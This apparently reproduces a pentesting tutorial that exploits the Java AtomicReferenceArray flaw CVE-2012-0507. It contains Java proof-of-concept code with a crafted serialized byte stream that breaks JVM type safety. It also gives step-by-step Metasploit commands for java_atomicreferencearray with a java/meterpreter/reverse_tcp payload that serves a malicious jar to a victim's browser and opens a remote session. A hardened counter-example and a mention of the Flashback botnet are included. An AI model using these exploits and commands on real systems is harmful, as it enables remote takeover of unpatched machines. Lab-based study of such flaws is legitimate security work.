Post on 27-May-2015
EXPLOITING JAVA VULNERABILITY (CVE-2012-0507) USING METASPLOIT
PenTesting Tutorials:
www.BreakTheSecurity.com
Introduction to the Java AtomicReferenceArray vulnerability
About CVE-2012-0507
A vulnerability in the JRE caused by the AtomicReferenceArray class implementation not checking that the array it is given is actually of the expected Object[] type. The vulnerability was found by Jeroen Frijters.
A malicious Java application or applet could use this flaw to crash the Java Virtual Machine (JVM) or to bypass Java sandbox restrictions.
Problematic code
public AtomicReferenceArray(E[] array) {
    // clone() preserves the runtime type of the caller's array (e.g. first[]),
    // so the backing store is not guaranteed to be a real Object[]
    this.array = array.clone();
}
Violating the Type Safety
import java.util.concurrent.atomic.*;

class first {}

public class violateClass {
    @SuppressWarnings({"rawtypes", "unchecked"})
    public static void main(String[] a) {
        Object obj = new first();
        // The backing array is cloned from a first[], so its runtime type is first[], not Object[]
        AtomicReferenceArray r = new AtomicReferenceArray(new first[1]);
        obj = "Hell";
        // set() writes through Unsafe rather than an ordinary array store, so on an unpatched JRE
        // the String is placed into a first[] without an ArrayStoreException
        r.set(0, obj);
        first f = (first) r.get(0);
    }
}
Exploiting
By manually constructing a serialized object graph you can stick any array you want into an AtomicReferenceArray instance and then use the AtomicReferenceArray.set() method to write an arbitrary reference to violate type safety.
import java.io.*;
import java.util.concurrent.atomic.*;

class Union1 { }
class Union2 { }

public class test {
    // Hand-built serialized object graph: an Object[2] whose element 0 is a Union1[1] and whose
    // element 1 is an AtomicReferenceArray whose "array" field is a back-reference to that same Union1[1]
    static byte[] buf = new byte[] {
        -84, -19, 0, 5,
        117, 114, 0, 19, 91, 76, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 79, 98, 106, 101, 99, 116, 59, -112, -50, 88, -97, 16, 115, 41, 108, 2, 0, 0, 120, 112,
        0, 0, 0, 2,
        117, 114, 0, 9, 91, 76, 85, 110, 105, 111, 110, 49, 59, -2, 44, -108, 17, -120, -74, -27, -1, 2, 0, 0, 120, 112, 0, 0, 0, 1, 112,
        115, 114, 0, 48, 106, 97, 118, 97, 46, 117, 116, 105, 108, 46, 99, 111, 110, 99, 117, 114, 114, 101, 110, 116, 46, 97, 116, 111, 109, 105, 99, 46, 65, 116, 111, 109, 105, 99, 82, 101, 102, 101, 114, 101, 110, 99, 101, 65, 114, 114, 97, 121, -87, -46, -34, -95, -66, 101, 96, 12, 2, 0, 1,
        91, 0, 5, 97, 114, 114, 97, 121, 116, 0, 19, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 120, 112,
        113, 0, 126, 0, 3
    };

    @SuppressWarnings({"rawtypes", "unchecked"})
    public static void main(String[] args) throws Throwable {
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(buf));
        Object[] arr = (Object[]) ois.readObject();
        Union1[] u1 = (Union1[]) arr[0];                          // typed alias of the shared array
        AtomicReferenceArray ara = (AtomicReferenceArray) arr[1]; // wraps that same Union1[] as its backing store
        ara.set(0, new Union2());   // Unsafe write: a Union2 lands in a Union1[] with no ArrayStoreException
        System.out.println(u1[0]);  // u1[0] is statically a Union1 but actually holds a Union2
    }
}
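As an added example (not code from the original post or from the JDK), here is a hardened stand-in for the pattern above showing the two checks the vulnerable class lacked: copying the constructor argument into a genuine Object[] instead of cloning it, and rejecting any other array type when the object is deserialized. The class, method and field names are assumptions; the First[] planted via reflection stands in for what a crafted stream would deliver.

```java
import java.io.*;
import java.lang.reflect.Field;
import java.util.Arrays;

// Hardened stand-in (assumed names): the backing array is forced to be a real Object[]
// both on construction and on deserialization, the property the vulnerable class lacked.
public class HardenedRefArray implements Serializable {
    private static final long serialVersionUID = 1L;
    private final Object[] array;
    public HardenedRefArray(Object[] src) {
        // Unlike clone(), copyOf(..., Object[].class) yields runtime type Object[] whatever src's type was
        this.array = Arrays.copyOf(src, src.length, Object[].class);
    }
    public void set(int i, Object v) { array[i] = v; }  // ordinary array store, checked by the JVM
    public Object get(int i) { return array[i]; }
    public Class<?> backingType() { return array.getClass(); }
    // A crafted stream can place any Object[] subtype in this field, so re-check after defaultReadObject()
    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        in.defaultReadObject();
        if (array == null || array.getClass() != Object[].class)
            throw new InvalidObjectException("backing array must be exactly Object[], got " + array.getClass());
    }
    static class First implements Serializable { private static final long serialVersionUID = 1L; }
    static HardenedRefArray roundTrip(HardenedRefArray r) throws IOException, ClassNotFoundException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) { oos.writeObject(r); }
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bos.toByteArray()))) {
            return (HardenedRefArray) ois.readObject();
        }
    }
    public static void main(String[] args) throws Exception {
        HardenedRefArray r = new HardenedRefArray(new First[1]);
        System.out.println("backing type after construction: " + r.backingType()); // class [Ljava.lang.Object;
        r.set(0, "a String");  // allowed, and harmless: no First[] aliases this storage
        System.out.println("genuine Object[] survives round-trip: " + roundTrip(r).get(0));

        // Constructed bad case: plant a First[] in the field, as a crafted stream would, then deserialize
        HardenedRefArray bad = new HardenedRefArray(new Object[1]);
        Field f = HardenedRefArray.class.getDeclaredField("array");
        f.setAccessible(true);
        f.set(bad, new First[1]);
        try {
            roundTrip(bad);
        } catch (InvalidObjectException e) {
            System.out.println("crafted stream rejected: " + e.getMessage());
        }
    }
}
```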
Exploiting this vulnerability using Metasploit
Requirements:
○ VirtualBox
○ Target OS (Windows, ...)
○ PenTesting distro (Backtrack)
○ JRE 6 (unpatched version)
Preparing Target Machine
Start the "Target" machine.
Install the JRE 6. (I have already installed the JRE.)
Preparing Attacker Machine
Now, start the BT5. Open the Terminal and type "msfupdate".
This will update the Metasploit Framework (MSF) with the latest exploits.
Open the Terminal and type msfconsole. Now type:
use exploit/multi/browser/java_atomicreferencearray
The above command loads the java_atomicreferencearray.rb module for the attack.
Now type "show options" to display the settings available and/or required for this specific module.
set SRVPORT 80
set URIPATH /
set SRVHOST [Backtrack_ip]
How to get the IP of Backtrack:
○ Open the Terminal
○ Type ifconfig
○ It will display the IP
Payload
Type "show payloads". This will display the list of payloads available to use.
I am going to use the reverse_tcp payload. This payload will get a reverse TCP connection from the Target to our machine.
Type set payload java/meterpreter/reverse_tcp
In order to get the reverse connection, we have to set the Backtrack IP in LHOST.
So type the following command: set LHOST [Backtrack_IP]
EXPLOIT
Are you ready?! Let us
We have set up everything needed for the exploit. So it is time to break into the Target machine.
Type "exploit" in the msfconsole.
This will start the reverse handler on our machine, and it will wait for anyone who connects to our HTTP server (e.g. http://192.168.56.102).
Once the victim connects to our server, it will send a jar that exploits the CVE-2012-0507 vulnerability.
Victim side
We have set up our exploit. Let us see what happens when our victim opens our URL.
Go to the "Target" VM. Open Firefox and enter the URL you got from the Metasploit exploit, e.g. http://192.168.56.102
No need to care about the '80' in the URL because it is the default port.
It loads nothing, but in the background Backtrack sends a jar file and exploits the vulnerability. After a successful exploit, it hands control to Backtrack.
Now type "sessions" in the Metasploit console; this will display the list of active sessions (victims list).
Type "sessions -i 1"; this will open the connection to the session with the id '1' and bring you to Meterpreter.
Meterpreter will help you interact with and control the Target.
Exploited in the Wild
In April 2012, research conducted by Dr.Web determined that more than 600,000 Mac computers were infected with the BackDoor.Flashback botnet.
Included in exploit kits
I hope this article has given you a good insight into how to use the Metasploit Framework to exploit the Java vulnerability.
I hope this will help you get into the PenTesting world!
For more PenTesting Tutorials: www.BreakTheSecurity.com